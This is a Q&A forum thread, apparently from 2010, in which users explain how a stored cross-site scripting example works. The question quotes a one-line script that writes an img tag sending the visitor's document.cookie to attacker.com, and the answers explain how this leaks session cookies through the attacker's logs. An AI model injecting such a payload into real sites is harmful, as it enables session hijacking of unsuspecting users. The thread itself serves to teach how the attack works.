tags:

views:

80

answers:

3
+1  Q: 

Question on a type of XSS attack

Cited from http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt:

As many here probably know, current XSS attacks typically come in two flavors: 1 - Attacker uploads tags to a public bulliten board, blog, or other site that has an XSS vulnerability and that lots of other users will visit. Attacker normally harvests site cookies for later user impersonation, but form submits and other attacks are sometimes utilized. This is what many folks I talk to think XSS is. Here's an example:

Someone would post the following on evilblog.com that other users would process

<script>document.write("<img src=http://attacker.com/” + document.cookie + “>”)</script>

This would try to pull an image off the attacker's server with the user's evilblog cookies in the URL.

My Question:

I don't understand the purpose/result of image URL path being written above. Can anyone elaborate more on this?

PS: What does it means for "This would try to pull an image off the attacker's server with the user's evilblog cookies in the URL"

+1  A: 

The purpose is that an image is automatically retrieved by the browser; in the example the cookie details are set in the querystring to that URL, and so the attacker gets the URL, gets the cookie, and therefor gets the details required for authentication.

Noon Silk  2010-04-12 11:08:32
So "attacker.com" is meant for being attacked?
Ricky  2010-04-12 11:10:39
@Ricky: No, `attacker.com` is a website *controlled* by the attacker. So they will review the HTTP logs for their site, and see the details of the request (i.e. the authenticated cookie details) there (on *their* site).
Noon Silk  2010-04-12 11:12:06
+1  A: 

Simple. It initiates a request to hostile domain that contains the cookie in the URL of the request.

spender  2010-04-12 11:09:01
+1  A: 

The document.write() simply adds an img-tag to the site and the browser will try to load the image from that URL.

Scripts and Frames are sometimes blocked when they come from a different domain so the XSS attack would fail in this case. Images are usually allowed as many sites display images from a different host anyways so the XSS attack will succeed.

The result is an entry in the attackers log which contains the cookie information and since it usually returns nothing it's interpreted as a broken image so most browsers display nothing and the users don't suspect anything.

dbemerlin  2010-04-12 11:15:14
A lucent explanation on using of Images. Thanks.
Ricky  2010-04-12 11:17:48

related questions

Why does this remote script cause IE6 to hang?
HTTP input filter like mod_security for WebSphere?
Should I sanitize HTML markup for a hosted CMS?
HTML/Javascript app that runs on the filesystem, security issue
Gracefully closing a frame (toolbar) around an iframe
What's the best method for sanitizing user input with PHP?
How do you htmlencode using html agility pack?
XSS Blacklist - Is anyone aware of a reasonable one?
Do htmlspecialchars and mysql_real_escape_string keep my PHP code safe from injection?
What percentage of my time will be spent in user input verfication during web development?
How do you allow the usage of an <img> while preventing XSS?
What are the best practices for avoid xss attacks in a PHP site
How do use fckEditor safely, without risk of cross site scripting?
Will HTML Encoding prevent all kinds of XSS attacks?
Inform potential clients about security vulnerabilities?
Best Practice: Legitimate Cross-Site Scripting
Access to restricted URI denied code: 1012
How do you set up use HttpOnly cookies in PHP
When is it Best to Sanitize User Input?
How exactly do you configure httpOnlyCookies in ASP.NET?
How do you configure HttpOnly cookies in tomcat / java webapps?
Communicating between websites (using Javascript or ?)
Best regex to catch XSS (Cross-site Scripting) attack (in Java)?
Sanitising user input using Python
Catching SQL Injection and other Malicious Web Requests